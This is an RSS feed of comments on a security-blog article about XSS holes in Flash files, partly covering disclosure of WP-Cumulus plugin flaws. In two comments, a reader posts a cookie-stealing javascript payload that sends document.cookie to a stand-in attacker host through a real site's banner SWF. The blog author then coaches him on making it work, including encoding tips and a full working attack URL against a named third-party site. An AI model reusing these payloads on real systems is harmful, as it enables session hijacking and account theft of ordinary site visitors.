<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/MustLive Edition" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Коментарі для запису: XSS vulnerabilities in 8 millions flash files</title>
	<link>http://websecurity.com.ua/3789/</link>
	<description></description>
	<pubDate>Sun, 19 Apr 2026 09:44:09 +0000</pubDate>
	<generator>http://wordpress.org/?v=MustLive Edition</generator>

	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3789/#comment-369618</link>
		<pubDate>Thu, 18 Aug 2011 11:28:55 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-369618</guid>
					<description>&lt;strong&gt;Allison&lt;/strong&gt;, you are welcome.

I'm glad that you liked it.</description>
		<content:encoded><![CDATA[<p><strong>Allison</strong>, you are welcome.</p>
<p>I&#8217;m glad that you liked it.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: allison fretman</title>
		<link>http://websecurity.com.ua/3789/#comment-369562</link>
		<pubDate>Thu, 18 Aug 2011 00:00:16 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-369562</guid>
					<description>very informative article.

Thanks</description>
		<content:encoded><![CDATA[<p>very informative article.</p>
<p>Thanks
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3789/#comment-313650</link>
		<pubDate>Tue, 23 Mar 2010 14:03:57 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-313650</guid>
					<description>&lt;strong&gt;Alam&lt;/strong&gt;

You are welcome.</description>
		<content:encoded><![CDATA[<p><strong>Alam</strong></p>
<p>You are welcome.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: Alam</title>
		<link>http://websecurity.com.ua/3789/#comment-313583</link>
		<pubDate>Tue, 23 Mar 2010 07:00:37 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-313583</guid>
					<description>Great article, thanks for share.</description>
		<content:encoded><![CDATA[<p>Great article, thanks for share.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3789/#comment-310142</link>
		<pubDate>Sun, 21 Feb 2010 19:35:40 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-310142</guid>
					<description>&lt;strong&gt;Jiet&lt;/strong&gt;

First, you can use XSS holes not only for cookie stealing, but also for other attacks (like advanced XSS attacks or attacking browsers of the users with exploits).

Second, you can steal cookies if you want. Just do it right ;-).

&lt;blockquote&gt;There seem to be a problem with the “+document.cookie” (or ‘+’ anything) part…&lt;/blockquote&gt;
Flash banner at wildlifefocus.com is using target=_blank. And as I wrote in my article, in such flash files it’s not possible to get to cookies in Internet Explorer (particularly IE6), Mozilla and Google Chrome. The code will be executed not in context of the site.

But it works in Firefox 3 and Opera 9.52 - in these browsers the code will be executed in context of the site. But they still don't give you normal possibility to read cookies. I.e. they give you to read test cookies (which were added to the browser, e.g. via Cookie Editor plugin for Firefox), but not read sites cookies.

So, first, you need to find flash file without target=_blank.

Second, use %2b instead of +. And the attack will work.

Here is an example for &lt;a href="http://www.wie-man-sieht.net/rod_web/_flash/World_CL.swf?url=javascript:window.open('http://JIETSEVILSITE.EVIL?stolencookie='%2Bdocument.cookie,'New',width=1,height=1,scrollbars='no')//" rel="nofollow"&gt;wie-man-sieht.net&lt;/a&gt;.</description>
		<content:encoded><![CDATA[<p><strong>Jiet</strong></p>
<p>First, you can use XSS holes not only for cookie stealing, but also for other attacks (like advanced XSS attacks or attacking browsers of the users with exploits).</p>
<p>Second, you can steal cookies if you want. Just do it right <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> .</p>
<blockquote><p>There seem to be a problem with the “+document.cookie” (or ‘+’ anything) part…</p></blockquote>
<p>Flash banner at wildlifefocus.com is using target=_blank. And as I wrote in my article, in such flash files it’s not possible to get to cookies in Internet Explorer (particularly IE6), Mozilla and Google Chrome. The code will be executed not in context of the site.</p>
<p>But it works in Firefox 3 and Opera 9.52 - in these browsers the code will be executed in context of the site. But they still don&#8217;t give you normal possibility to read cookies. I.e. they give you to read test cookies (which were added to the browser, e.g. via Cookie Editor plugin for Firefox), but not read sites cookies.</p>
<p>So, first, you need to find flash file without target=_blank.</p>
<p>Second, use %2b instead of +. And the attack will work.</p>
<p>Here is an example for <a href="http://www.wie-man-sieht.net/rod_web/_flash/World_CL.swf?url=javascript:window.open('http://JIETSEVILSITE.EVIL?stolencookie='%2Bdocument.cookie,'New',width=1,height=1,scrollbars='no')//" rel="nofollow">wie-man-sieht.net</a>.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: Jiet</title>
		<link>http://websecurity.com.ua/3789/#comment-310097</link>
		<pubDate>Sat, 20 Feb 2010 16:43:39 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-310097</guid>
					<description>STEALING COOKIES IS NOT THAT EASY :( - However reading cookies (and smell the delicious aroma, mmm...) IS!!! (and yes, I'm just kidding about the last one - and I don't think silicium harddrive cookies are healthy anyway)


Ok, ok, let's get to the point:

However may be able to use javascript to read the session cookies and sent it to another site to save it and use someone else his/her acount.

Example:

Run this code on the website you want to steal the cookie....
[code]
javascript:window.open("http://JIETSEVILSITE.EVIL?stolencookie="+document.cookie , "New", "width=1,height=1,scrollbars=no")
[/code]


But it just doesn't seem to work if I put it after a 'clickTAG'...
Example:

[code]
http://www.wildlifefocus.com/NLD/Sponsors/DaimlerChrysler_banner_468X60.swf?clickTAG=javascript:window.open("http://JIETSEVILSITE.EVIL?stolencookie="+document.cookie , "New", width=1,height=1,scrollbars=no")
[/code]

It opens a new window, but doesn't sent the cookie to your site.
Or asks you if you want to save the file or just doesn't open at all...
Depending on the browser.

There seem to be a problem with the "+document.cookie" (or '+' anything) part...  But Why? ;)</description>
		<content:encoded><![CDATA[<p>STEALING COOKIES IS NOT THAT EASY <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  - However reading cookies (and smell the delicious aroma, mmm&#8230;) IS!!! (and yes, I&#8217;m just kidding about the last one - and I don&#8217;t think silicium harddrive cookies are healthy anyway)</p>
<p>Ok, ok, let&#8217;s get to the point:</p>
<p>However may be able to use javascript to read the session cookies and sent it to another site to save it and use someone else his/her acount.</p>
<p>Example:</p>
<p>Run this code on the website you want to steal the cookie&#8230;.<br />
[code]<br />
javascript:window.open(&#8221;http://JIETSEVILSITE.EVIL?stolencookie=&#8221;+document.cookie , &#8220;New&#8221;, &#8220;width=1,height=1,scrollbars=no&#8221;)<br />
[/code]</p>
<p>But it just doesn&#8217;t seem to work if I put it after a &#8216;clickTAG&#8217;&#8230;<br />
Example:</p>
<p>[code]<br />
<a href="http://www.wildlifefocus.com/NLD/Sponsors/DaimlerChrysler_banner_468X60.swf?clickTAG=javascript:window.open" rel="nofollow">http://www.wildlifefocus.com/NLD/Sponsors/DaimlerChrysler_banner_468X60.swf?clickTAG=javascript:window.open</a>(&#8221;http://JIETSEVILSITE.EVIL?stolencookie=&#8221;+document.cookie , &#8220;New&#8221;, width=1,height=1,scrollbars=no&#8221;)<br />
[/code]</p>
<p>It opens a new window, but doesn&#8217;t sent the cookie to your site.<br />
Or asks you if you want to save the file or just doesn&#8217;t open at all&#8230;<br />
Depending on the browser.</p>
<p>There seem to be a problem with the &#8220;+document.cookie&#8221; (or &#8216;+&#8217; anything) part&#8230;  But Why? <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3789/#comment-308748</link>
		<pubDate>Wed, 13 Jan 2010 21:55:22 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-308748</guid>
					<description>&lt;strong&gt;kgraeme&lt;/strong&gt;, I informed the author of WP-Cumulus about HTML injection hole and he'd think about it. But because the core functionality of the plugin is vulnerable, it'll be hard to fix this kind of vulnerability.

So for now only XSS hole in WP-Cumulus is fixed. And it's unknown if HTML Injection hole will be fixed.</description>
		<content:encoded><![CDATA[<p><strong>kgraeme</strong>, I informed the author of WP-Cumulus about HTML injection hole and he&#8217;d think about it. But because the core functionality of the plugin is vulnerable, it&#8217;ll be hard to fix this kind of vulnerability.</p>
<p>So for now only XSS hole in WP-Cumulus is fixed. And it&#8217;s unknown if HTML Injection hole will be fixed.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: kgraeme</title>
		<link>http://websecurity.com.ua/3789/#comment-308736</link>
		<pubDate>Wed, 13 Jan 2010 16:56:45 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-308736</guid>
					<description>Ah, yes. Just tested it and yes it does still have HTML injection. That sucks.</description>
		<content:encoded><![CDATA[<p>Ah, yes. Just tested it and yes it does still have HTML injection. That sucks.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/3789/#comment-308726</link>
		<pubDate>Wed, 13 Jan 2010 12:57:02 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-308726</guid>
					<description>&lt;strong&gt;kgraeme&lt;/strong&gt;

Yes, I know it. After I informed developer of WP-Cumulus in November, Roy fixed XSS hole and wrote a &lt;a href="http://www.roytanck.com/2009/11/15/wp-cumulus-updated-to-address-yet-another-security-issue/" target="_blank" rel="nofollow"&gt;post&lt;/a&gt; about it.

But he didn't fix HTML Injection, so every tagcloud.swf file (with or without fixed XSS hole) can be used for HTML Injection attacks. I wrote about it in my article &lt;a href="http://websecurity.com.ua/3842/" rel="nofollow"&gt;XSS vulnerabilities in 34 millions flash files&lt;/a&gt;.</description>
		<content:encoded><![CDATA[<p><strong>kgraeme</strong></p>
<p>Yes, I know it. After I informed developer of WP-Cumulus in November, Roy fixed XSS hole and wrote a <a href="http://www.roytanck.com/2009/11/15/wp-cumulus-updated-to-address-yet-another-security-issue/" target="_blank" rel="nofollow">post</a> about it.</p>
<p>But he didn&#8217;t fix HTML Injection, so every tagcloud.swf file (with or without fixed XSS hole) can be used for HTML Injection attacks. I wrote about it in my article <a href="http://websecurity.com.ua/3842/" rel="nofollow">XSS vulnerabilities in 34 millions flash files</a>.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: kgraeme</title>
		<link>http://websecurity.com.ua/3789/#comment-308695</link>
		<pubDate>Tue, 12 Jan 2010 16:01:17 +0000</pubDate>
		<guid>http://websecurity.com.ua/3789/#comment-308695</guid>
					<description>The current version 1.2.3 of the wp-cumulus plugin appears to have fixed the XSS problem.</description>
		<content:encoded><![CDATA[<p>The current version 1.2.3 of the wp-cumulus plugin appears to have fixed the XSS problem.
</p>
]]></content:encoded>
				</item>
</channel>
</rss>
